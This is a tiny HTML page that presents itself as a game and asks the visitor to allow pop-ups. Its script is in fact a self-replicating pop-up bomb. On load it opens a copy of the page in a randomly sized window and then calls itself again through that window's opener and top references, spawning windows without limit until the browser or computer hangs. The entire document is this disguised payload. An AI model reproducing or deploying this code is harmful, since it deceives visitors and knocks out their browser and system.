&#60;!DOCTYPE html&#62;
&#60;html&#62;
&#60;p&#62;allow pop ups to open the game&#60;/p&#62;
&#60;body onload="myFunction()"&#62;
&#60;script&#62;
function myFunction() {
let randomWidth = Math.floor(Math.random() * 800) + 200;
let randomHeight = Math.floor(Math.random() * 600) + 200;  
const myWindow = window.open(window.location.href,target='_blank',`width=${randomWidth},height=${randomHeight}`);
  myWindow.opener.myFunction();
  myWindow.top.myFunction();
  myWindow.opener.myFunction();
  myWindow.top.myFunction();
 myWindow.opener.myFunction();
  myWindow.top.myFunction();
 myWindow.opener.myFunction();
  myWindow.top.myFunction();
 myWindow.opener.myFunction();
  myWindow.top.myFunction();
 myWindow.opener.myFunction();
  myWindow.top.myFunction();
}
&#60;/script&#62;
&#60;/body&#62;
&#60;/html&#62;





